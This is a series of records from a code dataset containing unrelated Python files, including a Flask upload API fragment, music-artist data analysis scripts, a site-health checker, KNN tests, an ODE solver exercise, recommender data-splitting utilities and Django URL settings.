= \"sudo convert {} {} && rm {}\".format(\n # os.path.join(app.config['UPLOADED_PHOTOS_DEST'], filename),\n # os.path.join(app.config['INPUT_PHOTOS_DEST'], rawFileName),\n # os.path.join(app.config['UPLOADED_PHOTOS_DEST'], filename)),\n\n #cmd = \"sudo convert {} {}\".format(\n # os.path.join(app.config['UPLOADED_PHOTOS_DEST'], filename),\n # os.path.join(app.config['INPUT_PHOTOS_DEST'], rawFileName)),\n\n #print(cmd)\n #call(cmd, shell=True)\n\n #pdb.set_trace()\n for task in TARGET_TASKS:\n process_input_file(src, uploadDirForToken(uploadToken), dir_for_token, filename, task, uploadToken)\n #pdb.set_trace()\n return filename, 200\n else:\n print(\"what\") # else:\n # for k, v in request.__dict__.items():\n # print k, v\n return \"We're good.\", 200\n except:\n traceback.print_exc()\n\ndef s3_file_exists(bucket, key):\n try:\n s3.Object(bucket, key).load()\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n return False\n else:\n # Something else has gone wrong.\n raise\n else:\n return True\n\n@app.route('/getresults', methods=['GET'])\ndef get_results():\n try:\n validate_captcha(request)\n # print(request.args['uploadtoken'])\n # print(request.args['task'])\n dir_for_token = uploadDirForToken(request.args['uploadtoken'])\n fname = secureFileName(request.args['uploadtoken'], \"__\") + display_name_to_task[request.args['task']] + \".png\"\n s3.Object(app.config['PROCESSED_PHOTOS_DEST'], fname).delete()\n\n # fname_url = subpath.replace(\" \", \"%20\")\n # print(image_path)\n # try:\n # call(\"sudo rm {}\".format(image_path), shell=True)\n # except:\n # tb.print_exc()\n for i in range(5 * 60 * 4):\n #pdb.set_trace()\n if s3_file_exists(app.config['PROCESSED_PHOTOS_DEST'], fname):\n return \"//s3-us-west-2.amazonaws.com/task-demo-results/\" + fname, 200\n # print(\"waiting\", os.path.join(app.config['PROCESSED_PHOTOS_DEST'], fname))\n time.sleep(0.25)\n # This might not be a jpg\n return \"//3d4igz27oxtl2iwox73y9smh-wpengine.netdna-ssl.com/media/wp-content/uploads/sites/3/2017/07/22-cool-cat-wearing-earphones-funny-kitten-fails.jpg\", 500\n except:\n traceback.print_exc()\n return \"Error\", 500\n\n@app.route('/results/')\ndef send_js(path):\n print(path)\n return send_from_directory(app.config['PROCESSED_PHOTOS_DEST'] , path)\n\n#@app.route('/ping', methods=['GET'])\n@app.route('/demopage/ping', methods=['GET'])\ndef ping():\n return \"OK\", 200, {'content-length':'2'}\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=False, port=80, threaded=True)\n\n","sub_path":"task_demo_api.py","file_name":"task_demo_api.py","file_ext":"py","file_size_in_byte":14620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319285970","text":"# -*- coding: utf-8 -*- \n# @Time : 2019/12/17 9:46\n# @Author : hangzhouwh \n# @Email: hangzhouwh@gmail.com\n# @File : baike_proc.py \n# @Software: PyCharm\nimport operator\nimport re\nimport pandas as pd\nfrom music163.proc import lyric_cloudy\nfrom music163.tool import json_tool\n\n\ndef get_occupation_scatter(datas):\n\toccupation = []\n\tfor artist in datas:\n\t\tattr_name = artist['attr_name']\n\t\tattr_value = artist['attr_value']\n\t\tif '职业' in attr_name:\n\t\t\tidx = attr_name.index('职业')\n\t\t\toccupation.append(attr_value[idx])\n\n\tocs = []\n\tfor occu in occupation:\n\t\tfor occ in occu:\n\t\t\tocc_lst = re.split(\" |,|,|/|;|;\", occ)\n\t\t\tfor occ_value in reversed(occ_lst):\n\t\t\t\tif occ_value == '':\n\t\t\t\t\tocc_lst.remove(occ_value)\n\t\t\tocs.extend(occ_lst)\n\t# ocs = list(set(ocs))\n\tocs_frequency = lyric_cloudy.get_word_frequency(ocs)\n\n\tocs_fre = []\n\tcount = []\n\toc = []\n\trate = []\n\tsum = 0\n\tfor x in ocs_frequency:\n\t\tif x[1] >= 10:\n\t\t\tocs_fre.append(x)\n\t\t\tsum = sum + x[1]\n\n\tfor x in ocs_fre:\n\t\toc.append(x[0])\n\t\tcount.append(x[1])\n\t\trate.append(x[1]/sum)\n\n\tdf = pd.DataFrame([oc, count, rate], index=['oc', 'count', 'rate'])\n\tdf = pd.DataFrame(df.values.T, index=df.columns, columns=df.index)\n\tdf.to_csv('D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\result\\\\百科_职业分布.csv', encoding='utf_8_sig')\n\n\ndef occ_morethanone(datas):\n\toccupation = []\n\tfor artist in datas:\n\t\tattr_name = artist['attr_name']\n\t\tattr_value = artist['attr_value']\n\t\tif '职业' in attr_name:\n\t\t\tidx = attr_name.index('职业')\n\t\t\toccupation.append(attr_value[idx])\n\tmorethanone = []\n\tcount = []\n\tfor x in occupation:\n\t\tif len(x) in morethanone:\n\t\t\tidx = morethanone.index(len(x))\n\t\t\tcount[idx] += 1\n\t\telse:\n\t\t\tmorethanone.append(len(x))\n\t\t\tcount.append(1)\n\n\tdf = pd.DataFrame([morethanone, count], index=['morethanone', 'count'])\n\tdf = pd.DataFrame(df.values.T, index=df.columns, columns=df.index)\n\tdf.to_csv('D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\result\\\\百科_个人职业数量分布.csv', encoding='utf_8_sig')\n\n\n\ndef get_nationality(datas):\n\tnationality = []\n\tfor artist in datas:\n\t\tattr_name = artist['attr_name']\n\t\tattr_value = artist['attr_value']\n\t\tif '国籍' in attr_name:\n\t\t\tidx = attr_name.index('国籍')\n\t\t\tfor x in attr_value[idx]:\n\t\t\t\tcountry_lst = re.split(\",|,|/|;|;\", x)\n\t\t\t\tnationality.extend(country_lst)\n\tnationality_set = list(set(nationality))\n\tcount = {}\n\tfor i in nationality:\n\t\tcount[i] = count.get(i, 0) + 1\n\n\tnationality_x = []\n\tnationality_count = []\n\tfor i in nationality_set:\n\t\tnationality_x.append(i)\n\t\tnationality_count.append(count.get(i))\n\n\tdf = pd.DataFrame([nationality_x, nationality_count], index=['nationality', 'count'])\n\tdf = pd.DataFrame(df.values.T, index=df.columns, columns=df.index)\n\tdf.to_csv('D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\result\\\\百科_国籍分布信息.csv', encoding='utf_8_sig')\n\n\ndef get_company(datas):\n\tcompanys = []\n\tfor artist in datas:\n\t\tattr_name = artist['attr_name']\n\t\tattr_value = artist['attr_value']\n\t\tif '经纪公司' in attr_name:\n\t\t\tidx = attr_name.index('经纪公司')\n\t\t\tfor value in attr_value[idx]:\n\t\t\t\tvalue_list = re.split(\",|,|/|;|;\", value)\n\t\t\t\tcompanys.extend(value_list)\n\n\tcompany_set = list(set(companys))\n\tcompany_count = {}\n\tfor company in company_set:\n\t\tcompany_count[company] = company_count.get(company, 0) + 1\n\n\tcount = []\n\tfor i in company_set:\n\t\tcount.append(company_count.get(i))\n\n\tdf = pd.DataFrame([company_set, count], index=['company', 'count'])\n\tdf = pd.DataFrame(df.values.T, index=df.columns, columns=df.index)\n\tdf.to_csv('D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\result\\\\百科_经济公司.csv', encoding='utf_8_sig')\n\n\ndef get_school(datas):\n\tschools = []\n\tfor artist in datas:\n\t\tattr_name = artist['attr_name']\n\t\tattr_value = artist['attr_value']\n\t\tif '毕业院校' in attr_name:\n\t\t\tidx = attr_name.index('毕业院校')\n\t\t\tschools.extend(attr_value[idx])\n\n\tschool_set = list(set(schools))\n\tschool_count = {}\n\tfor school in school_set:\n\t\tschool_count[school] = school_count.get(school, 0) + 1\n\n\tcount = []\n\tfor i in school_set:\n\t\tcount.append(school_count.get(i))\n\n\tdf = pd.DataFrame([school_set, count], index=['school', 'count'])\n\tdf = pd.DataFrame(df.values.T, index=df.columns, columns=df.index)\n\tdf.to_csv('D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\result\\\\百科_毕业院校.csv', encoding='utf_8_sig')\n\n\ndef wash_1():\n\tfilepath = 'D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\data\\\\baike_chinese_ar.json'\n\tdatas = json_tool.load_json(filepath)\n\tfor artist in reversed(datas):\n\t\tattr_name = artist['attr_name']\n\t\tattr_value = artist['attr_value']\n\t\tif len(attr_name) == 0:\n\t\t\tdatas.remove(artist)\n\tfilepath2 = 'D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\data\\\\baike_chinese_ar_1.0.json'\n\tjson_tool.write_json(datas, filepath2)\n\n\ndef get_decade(datas):\n\tbirths = []\n\tpattern = re.compile(r'\\d{4}')\n\tfor artist in datas:\n\t\tattr_name = artist['attr_name']\n\t\tattr_value = artist['attr_value']\n\t\tif '出生日期' in attr_name:\n\t\t\tidx = attr_name.index('出生日期')\n\t\t\tvalue = attr_value[idx][0]\n\t\t\tyear = pattern.findall(value)\n\t\t\tbirths.extend(year)\n\n\tbirth_set = list(set(births))\n\tbirth_count = [0 for index in range(len(birth_set))]\n\tfor birth in births:\n\t\tidx = birth_set.index(birth)\n\t\tbirth_count[idx] += 1\n\n\tdf = pd.DataFrame([birth_set, birth_count], index=['birth_year', 'count'])\n\tdf = pd.DataFrame(df.values.T, index=df.columns, columns=df.index)\n\tdf.to_csv('D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\result\\\\百科_出生.csv', encoding='utf_8_sig')\n\n\ndef get_achievement_size():\n\tfilepath = '../data/baike/baike_chinese_ar_clean.json'\n\tdatas = json_tool.load_json(filepath)\n\tprint(len(datas))\n\tfor data in reversed(datas):\n\t\tattr_name = data['attr_name']\n\t\tif '主要成就' not in attr_name:\n\t\t\tdatas.remove(data)\n\n\tachievements = []\n\tcount = {}\n\tfor data in datas:\n\t\tartist_id = data['artist_id']\n\t\tartist_name = data['artist_name']\n\t\tattr_name = data['attr_name']\n\t\tattr_value = data['attr_value']\n\t\tidx = attr_name.index('主要成就')\n\t\tachievement_list = attr_value[idx]\n\t\tachievements.extend(achievement_list)\n\t\tcount[artist_name] = len(achievement_list)\n\n\tcount = sorted(count.items(), key=operator.itemgetter(1), reverse=True)\n\n\tperson = []\n\tcnt = []\n\tfor x in count:\n\t\tperson.append(x[0])\n\t\tcnt.append(x[1])\n\n\tdf = pd.DataFrame([person, cnt], index=['歌手', '主要成就数量'])\n\tdf = pd.DataFrame(df.values.T, index=df.columns, columns=df.index)\n\tdf.to_csv('D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\result\\\\歌手主要成就数量.csv', encoding='utf_8_sig')\n\ndef get_ctbma():\n\tfilepath = '../data/baike/baike_chinese_ar_clean.json'\n\tdatas = json_tool.load_json(filepath)\n\tprint(len(datas))\n\tfor data in reversed(datas):\n\t\tattr_name = data['attr_name']\n\t\tif '主要成就' not in attr_name:\n\t\t\tdatas.remove(data)\n\n\tChinese_Three_Big_Movie_Awards = ['中国电影金鸡奖', '香港电影金像奖', '中国电影金鸡奖']\n\tctbma_artist = []\n\tctbma_artist_ac = []\n\tctbma_size = []\n\tachievements = []\n\tcount = {}\n\tfor data in datas:\n\t\tartist_id = data['artist_id']\n\t\tartist_name = data['artist_name']\n\t\tattr_name = data['attr_name']\n\t\tattr_value = data['attr_value']\n\t\tidx = attr_name.index('主要成就')\n\t\tachievement_list = attr_value[idx]\n\t\tcnt = 0\n\t\tfor award in Chinese_Three_Big_Movie_Awards:\n\t\t\tfor achievement in achievement_list:\n\t\t\t\tif award in achievement and artist_name not in ctbma_artist:\n\t\t\t\t\tcnt += 1\n\t\t\t\t\tctbma_artist.append(artist_name)\n\t\t\t\t\tctbma_artist_ac.append(achievement_list)\n\t\t\t\t\tbreak\n\t\t\t\telif award in achievement:\n\t\t\t\t\tcnt += 1\n\t\t\t\t\tbreak\n\t\tif cnt > 0:\n\t\t\tctbma_size.append(cnt)\n\n\tdf = pd.DataFrame([ctbma_artist, ctbma_size], index=['歌手', '华语三大电影奖获得数量'])\n\tdf = pd.DataFrame(df.values.T, index=df.columns, columns=df.index)\n\tdf.to_csv('D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\result\\\\华语三大电影奖获得数量.csv', encoding='utf_8_sig')\n\n\nif __name__ == \"__main__\":\n\t# artist_name # 中文名\n\t# nationality # 国籍 √\n\t# occupation # 职业 √\n\t# birthday # 出生日期\n\t# IBEC # 经纪公司 √\n\t# university # 毕业院校 √\n\tfilepath = '../data/baike/baike_chinese_ar_clean.json'\n\tdatas = json_tool.load_json(filepath)\n\tprint(len(datas))\n\tfor data in reversed(datas):\n\t\tattr_name = data['attr_name']\n\t\tif '主要成就' not in attr_name:\n\t\t\tdatas.remove(data)\n\n\tGolden_Melody_Awards_artist = []\n\tachievements = []\n\tfor data in datas:\n\t\tflag = 0\n\t\tartist_id = data['artist_id']\n\t\tartist_name = data['artist_name']\n\t\tattr_name = data['attr_name']\n\t\tattr_value = data['attr_value']\n\t\tidx = attr_name.index('主要成就')\n\t\tachievement_list = attr_value[idx]\n\t\tfor achievement in achievement_list:\n\t\t\tif \"金曲奖\" in achievement:\n\t\t\t\tGolden_Melody_Awards_artist.append(artist_name)\n\t\t\t\tflag = 1\n\t\t\t\tbreak\n\t\tif flag == 1:\n\t\t\tachievements.append(achievement_list)\n\n\tacs = []\n\tfor achievement in achievements:\n\t\tac = ','.join(achievement)\n\t\tacs.append(ac)\n\n\tdf = pd.DataFrame([Golden_Melody_Awards_artist, acs], index=['歌手', '华语三大电影奖获得数量'])\n\tdf = pd.DataFrame(df.values.T, index=df.columns, columns=df.index)\n\tdf.to_csv('D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\result\\\\金曲奖获得者.csv', encoding='utf_8_sig')\n\n","sub_path":"music163/proc/baike_proc.py","file_name":"baike_proc.py","file_ext":"py","file_size_in_byte":9176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"527644930","text":"import argparse\nimport requests\nimport whois\nimport tldextract\nfrom datetime import datetime, timedelta\n\n\ndef create_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--filepath', required=True,\n type=argparse.FileType('r'),\n help='the path to the file')\n return parser\n\n\ndef get_urls_from_text(text):\n urls = [url.strip() for url in text]\n return urls\n\n\ndef is_server_respond_with_200(url):\n try:\n status_code = requests.get(url).status_code\n return status_code == 200\n except requests.exceptions.ConnectionError:\n return False\n\n\ndef get_domain_expiration_date(domain_name):\n domain_info = whois.whois(domain_name)\n expiration_date = domain_info.expiration_date\n if isinstance(expiration_date, list):\n expiration_date = expiration_date[0]\n return expiration_date\n\n\ndef get_info_about_the_sites(urls):\n info_all_sites = []\n for url in urls:\n domain_name = tldextract.extract(url).registered_domain\n status_200 = 'OK' if is_server_respond_with_200(url) else 'BAD'\n expiration_date = get_domain_expiration_date(domain_name)\n date_in_next_month = datetime.today() + timedelta(365 / 12)\n try:\n expiration_date = 'OK' if expiration_date > date_in_next_month else 'BAD'\n except TypeError:\n expiration_date = 'failed to get data'\n info_all_sites.append(\n {'url': url, 'status': status_200, 'exp_date': expiration_date})\n return info_all_sites\n\n\ndef output_sites_info_to_console(info_all_sites):\n print('\\n{:>5}{:>40}{:>40}\\n'.format(\n 'URL', 'Status 200', 'Domain extended for a month or more'))\n for site_info in info_all_sites:\n print(\"{url:<40}{status:<10}{exp_date:^40}\".format(**site_info))\n\n\nif __name__ == '__main__':\n parser = create_parser()\n args = parser.parse_args()\n urls_list = get_urls_from_text(args.filepath)\n info_all_sites = get_info_about_the_sites(urls_list)\n output_sites_info_to_console(info_all_sites)\n","sub_path":"check_sites_health.py","file_name":"check_sites_health.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"410833869","text":"import numpy as np\nfrom src import KNearestNeighbor, load_json_data\nfrom src import accuracy\nimport os\n\ndef test_k_nearest_neighbor():\n datasets = [\n os.path.join('data', x)\n for x in os.listdir('data')\n if os.path.splitext(x)[-1] == '.json'\n ]\n\n aggregators = ['mean', 'mode', 'median']\n distances = ['euclidean', 'manhattan']\n for data_path in datasets:\n # Load data and make sure its shape is correct\n features, targets = load_json_data(data_path)\n targets = targets[:, None] # expand dims\n for d in distances:\n for a in aggregators:\n # make model and fit\n knn = KNearestNeighbor(1, distance_measure=d, aggregator=a)\n knn.fit(features, targets)\n\n # predict and calculate accuracy\n labels = knn.predict(features)\n acc = accuracy(targets, labels)\n\n # error if there's an issue\n msg = 'Failure with dataset: {}. Settings: dist={}, agg={}.'.format(data_path, d, a)\n assert (acc == 1.0), msg\n\n\ndef test_aggregators():\n _features = np.array([\n [-1, 1, 1, -1, 2],\n [-1, 1, 1, -1, 1],\n [-1, 2, 2, -1, 1],\n [-1, 1, 1, -1, 1],\n [-1, 1, 1, -1, 1]\n ])\n\n _predict = np.array([\n [-1, 1, 0, -1, 0],\n [-1, 1, 1, -1, 0],\n [-1, 0, 1, 0, 0],\n [-1, 1, 1, -1, 1],\n [-1, 1, 1, -1, 0]\n ])\n _targets = np.array([\n [1, 0, 1],\n [1, 1, 5],\n [3, 1, 1],\n [1, 1, 2],\n [5, 1, 1]\n ])\n aggregators = ['mean', 'mode', 'median']\n answers = [\n np.repeat(np.mean(_targets, axis=0, keepdims=True), _targets.shape[0], axis=0),\n np.ones_like(_targets),\n np.repeat(np.median(_targets, axis=0, keepdims=True), _targets.shape[0], axis=0)\n ]\n _est = []\n for a in aggregators:\n knn = KNearestNeighbor(5, aggregator=a)\n knn.fit(_features, _targets)\n y = knn.predict(_predict)\n _est.append(y)\n assert (np.allclose(_est, answers))\n","sub_path":"KNN/tests/test_knn.py","file_name":"test_knn.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"469466406","text":"from x4defs import *\nimport x4fns\nfrom tech_leech import *\nfrom queue import Queue\nfrom threading import Thread\n\nclass DownloadWorker(Thread):\n def __init__(self, queue):\n Thread.__init__(self)\n self.queue = queue\n\n def run(self):\n while True:\n # Get the work from the queue and expand the tuple\n symbol = self.queue.get()\n tech_leech(symbol, 'H')\n self.queue.task_done()\n\nqueue = Queue()\n# Create 8 worker threads\nfor x in range(8):\n worker = DownloadWorker(queue)\n # Setting daemon to True will let the main thread exit even though the workers are blocking\n worker.daemon = True\n worker.start()\n# Get the list of stocks\ncatalog = x4fns.read_csv(EQCatalog)\nstocks = [{'symbol':x[PCAT['NSECODE']], 'ratios':x[PCAT['RATIOS']]} for x in catalog]\n# Put the tasks into the queue as a tuple\nfor symbol in [stock['symbol'] for stock in stocks]+['NIFTY']:\n print (\"Leeching technical for stock: \"+symbol)\n queue.put(symbol)\nqueue.join()\n","sub_path":"snippets/threading_code.py","file_name":"threading_code.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"503501152","text":"__author__ = 'jayanthvenkataraman'\n\nfrom flask import Flask\nimport os\n\napp = Flask(__name__)\n\n\n@app.route('/', methods = ['GET'])\ndef index():\n return \"Heroku Flask application Successfully deployed\"\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000)) #for taking Heroku's PORT environment variable\n app.run(host='0.0.0.0', port=port)","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"474588953","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = \"Xavier PESSOLES\"\n\n\n# EXERCICE 23\n# Question 1 \n# ==========\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\n\nimport scipy.integrate as spi\nn=1\nN=10000\n\ndef solve_eq(N,n,t0,tf):\n x = np.linspace(t0,tf,N)\n h = (tf-t0)/N\n y1=[0]\n y2=[1]\n for i in range(1,N):\n y1.append(h*y2[i-1]+y1[i-1])\n y2.append(h*(math.sin(n*x[i-1])+y1[i-1]-10*y2[i-1])+y2[i-1])\n \n return x,y1\n\ndef solve_syst(N,n,t0,tf):\n t = np.linspace(t0,tf,N)\n A=np.array([[0,1],[1,-10]])\n I=np.array([[1,0],[0,1]])\n X0 = np.array([[0],[1]])\n X = [X0]\n h= (tf-t0)/N\n for i in range(1,N):\n B=np.array([[0],[math.sin(n*t[i])]])\n Xk = np.dot(h*A+I,X0)+h*B\n X.append(Xk)\n X0=Xk\n res = [x[0][0] for x in X]\n return (t,res)\n\ndef fonction_f(X,t,n):\n return [X[1],X[0]-10*X[1]+np.sin(n*t)]\n\n\nles_t=np.linspace(0,7,N)\nfor i in range(0,8):\n #les_x,les_y = solve_eq(N,i,0,7)\n #plt.plot(les_x,les_y)\n #les_x,les_y = solve_syst(N,i,0,7)\n #plt.plot(les_x,les_y)\n res = spi.odeint(fonction_f,[0,1],les_t,(i,))\n plt.plot(les_t,res[:,0])\nplt.show()\n \n \n","sub_path":"Exercices/Exos_Divers/programmes/Exercice_FB_12/exercice_23.py","file_name":"exercice_23.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"131112908","text":"import sys\nimport json\nfrom pathlib import Path\n\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom src.sanity_check import is_valid\nfrom src.embeddings import MeanWordEmbeddingExtractor\n\n\ndef main():\n icons_dir_path, word_vectors_path = sys.argv[1:]\n \n icons_dir_path = Path(icons_dir_path)\n \n print('loading alt text embedding extractor')\n alt_text_embedding_extractor = MeanWordEmbeddingExtractor(word_vectors_path)\n \n print('extracting and saving alt text embeddings')\n for json_path in tqdm(list(icons_dir_path.glob('*.json'))):\n try:\n with open(str(json_path), 'r') as f:\n attributes = json.load(f)['attributes']\n\n if attributes.get('alt'): # is not None or decorative a.k.a \"\"\n identifier = json_path.name.split('.')[0]\n\n image = cv2.imread(str(json_path.parent) + '/' + '{}.jpg'.format(identifier))\n\n if is_valid(attributes['alt']):\n embedding = alt_text_embedding_extractor.extract(attributes['alt'])\n \n np.save('{}/{}.npy'.format(json_path.parent, identifier), embedding)\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bin/extract_alt_text_embeddings.py","file_name":"extract_alt_text_embeddings.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"100074449","text":"# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License.\n\nimport pandas as pd\nimport numpy as np\n\nfrom reco_utils.common.constants import DEFAULT_ITEM_COL, DEFAULT_USER_COL\n\ntry:\n from pyspark.sql.functions import col, broadcast\nexcept ImportError:\n pass # so the environment without spark doesn't break\n\n\ndef process_split_ratio(ratio):\n \"\"\"Generate split ratio lists\n\n Args:\n ratio (float or list): a float number that indicates split ratio or a list of float\n numbers that indicate split ratios (if it is a multi-split).\n\n Returns:\n tuple: a tuple containing\n bool: A boolean variable multi that indicates if the splitting is multi or single.\n list: A list of normalized split ratios.\n \"\"\"\n if isinstance(ratio, float):\n if ratio <= 0 or ratio >= 1:\n raise ValueError(\"Split ratio has to be between 0 and 1\")\n\n multi = False\n elif isinstance(ratio, list):\n if any([x <= 0 for x in ratio]):\n raise ValueError(\n \"All split ratios in the ratio list should be larger than 0.\"\n )\n\n # normalize split ratios if they are not summed to 1\n if sum(ratio) != 1.0:\n ratio = [x / sum(ratio) for x in ratio]\n\n multi = True\n else:\n raise TypeError(\"Split ratio should be either float or a list of floats.\")\n\n return multi, ratio\n\n\ndef min_rating_filter_pandas(\n data,\n min_rating=1,\n filter_by=\"user\",\n col_user=DEFAULT_USER_COL,\n col_item=DEFAULT_ITEM_COL,\n):\n \"\"\"Filter rating DataFrame for each user with minimum rating.\n Filter rating data frame with minimum number of ratings for user/item is usually useful to\n generate a new data frame with warm user/item. The warmth is defined by min_rating argument. For\n example, a user is called warm if he has rated at least 4 items.\n\n Args:\n data (pd.DataFrame): DataFrame of user-item tuples. Columns of user and item\n should be present in the DataFrame while other columns like rating, \n timestamp, etc. can be optional.\n min_rating (int): minimum number of ratings for user or item.\n filter_by (str): either \"user\" or \"item\", depending on which of the two is to \n filter with min_rating.\n col_user (str): column name of user ID.\n col_item (str): column name of item ID.\n\n Returns:\n pd.DataFrame: DataFrame with at least columns of user and item that has been \n filtered by the given specifications.\n \"\"\"\n split_by_column, _ = _check_min_rating_filter(\n filter_by, min_rating, col_user, col_item\n )\n rating_filtered = data.groupby(split_by_column).filter(\n lambda x: len(x) >= min_rating\n )\n return rating_filtered\n\n\ndef min_rating_filter_spark(\n data,\n min_rating=1,\n filter_by=\"user\",\n col_user=DEFAULT_USER_COL,\n col_item=DEFAULT_ITEM_COL,\n):\n \"\"\"Filter rating DataFrame for each user with minimum rating.\n Filter rating data frame with minimum number of ratings for user/item is usually useful to\n generate a new data frame with warm user/item. The warmth is defined by min_rating argument. For\n example, a user is called warm if he has rated at least 4 items.\n\n Args:\n data (spark.DataFrame): DataFrame of user-item tuples. Columns of user and item\n should be present in the DataFrame while other columns like rating, \n timestamp, etc. can be optional.\n min_rating (int): minimum number of ratings for user or item.\n filter_by (str): either \"user\" or \"item\", depending on which of the two is to \n filter with min_rating.\n col_user (str): column name of user ID.\n col_item (str): column name of item ID.\n\n Returns:\n spark.DataFrame: DataFrame with at least columns of user and item that has been \n filtered by the given specifications.\n \"\"\"\n split_by_column, split_with_column = _check_min_rating_filter(\n filter_by, min_rating, col_user, col_item\n )\n rating_temp = (\n data.groupBy(split_by_column)\n .agg({split_with_column: \"count\"})\n .withColumnRenamed(\"count(\" + split_with_column + \")\", \"n\" + split_with_column)\n .where(col(\"n\" + split_with_column) >= min_rating)\n )\n\n rating_filtered = data.join(broadcast(rating_temp), split_by_column).drop(\n \"n\" + split_with_column\n )\n return rating_filtered\n\n\ndef _check_min_rating_filter(filter_by, min_rating, col_user, col_item):\n if not (filter_by == \"user\" or filter_by == \"item\"):\n raise ValueError(\"filter_by should be either 'user' or 'item'.\")\n\n if min_rating < 1:\n raise ValueError(\"min_rating should be integer and larger than or equal to 1.\")\n\n split_by_column = col_user if filter_by == \"user\" else col_item\n split_with_column = col_item if filter_by == \"user\" else col_user\n return split_by_column, split_with_column\n\n\ndef split_pandas_data_with_ratios(data, ratios, seed=42, shuffle=False):\n \"\"\"Helper function to split pandas DataFrame with given ratios\n\n Note:\n Implementation referenced from\n https://stackoverflow.com/questions/38250710/how-to-split-data-into-3-sets-train-validation-and-test\n\n Args:\n data (pd.DataFrame): Pandas data frame to be split.\n ratios (list of floats): list of ratios for split. The ratios have to sum to 1.\n seed (int): random seed.\n shuffle (bool): whether data will be shuffled when being split.\n\n Returns:\n list: List of pd.DataFrame splitted by the given specifications.\n \"\"\"\n if sum(ratios) != 1.0:\n raise ValueError(\"The ratios have to sum to 1\")\n\n split_index = np.cumsum(ratios).tolist()[:-1]\n\n if shuffle:\n data = data.sample(frac=1, random_state=seed)\n\n splits = np.split(data, [round(x * len(data)) for x in split_index])\n\n # Add split index (this makes splitting by group more efficient).\n for i in range(len(ratios)):\n splits[i][\"split_index\"] = i\n\n return splits\n","sub_path":"2019/6-azureml-movie-recommendation/movielens-sar/reco_utils/dataset/split_utils.py","file_name":"split_utils.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"593708390","text":"from django.conf.urls.defaults import *\n\nimport accounts.urls\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Example:\n # (r'^mayversion/', include('mayversion.foo.urls')),\n (r'^$', 'accounts.views.my'),\n (r'^accounts/', include('accounts.urls')),\n (r'^messages/', include('messages.urls')),\n (r'^chat/', include('chat.urls')),\n # Uncomment the admin/doc line below and add 'django.contrib.admindocs'\n # to INSTALLED_APPS to enable admin documentation:\n # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n (r'^admin/', include(admin.site.urls)),\n (r'^avatar/', include('avatar.urls')),\n (r'^avatar_crop/', include('avatar_crop.urls')),\n\n url(r'^accounts/login/', 'django.contrib.auth.views.login', name='auth_login'),\n url(r'^accounts/logout/', 'django.contrib.auth.views.logout', name='auth_logout'),\n\n)\n\nfrom django.conf import settings\nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n (r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_ROOT}),\n )\n","sub_path":"mayversion/mayversion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"71532589","text":"\"\"\"\nReads the .csv files and writes them back out in the project's \"standard\" csv format\nAlso removes \"NA\". \n\nWrites to FILENAME_standardformat.csv -- check the output is good before overwriting\n\"\"\"\n\nfrom .utils import get_group_writer, get_variable_writer, get_schedule_parts_writer, fix_row\n\nimport csv\n \nif __name__ == '__main__':\n\n for filetype in ['groups', 'variables', 'schedule_parts']:\n INFILE = filetype + \".csv\"\n OUTFILE = filetype + \"_standardformat.csv\"\n\n writer = None\n if filetype == 'groups':\n writer = get_group_writer(OUTFILE)\n elif filetype == 'variables':\n writer = get_variable_writer(OUTFILE)\n elif filetype == 'schedule_parts':\n writer = get_schedule_parts_writer(OUTFILE)\n\n\n infile = open(INFILE, 'r')\n reader = csv.DictReader(infile)\n for row in reader:\n result = fix_row(row)\n 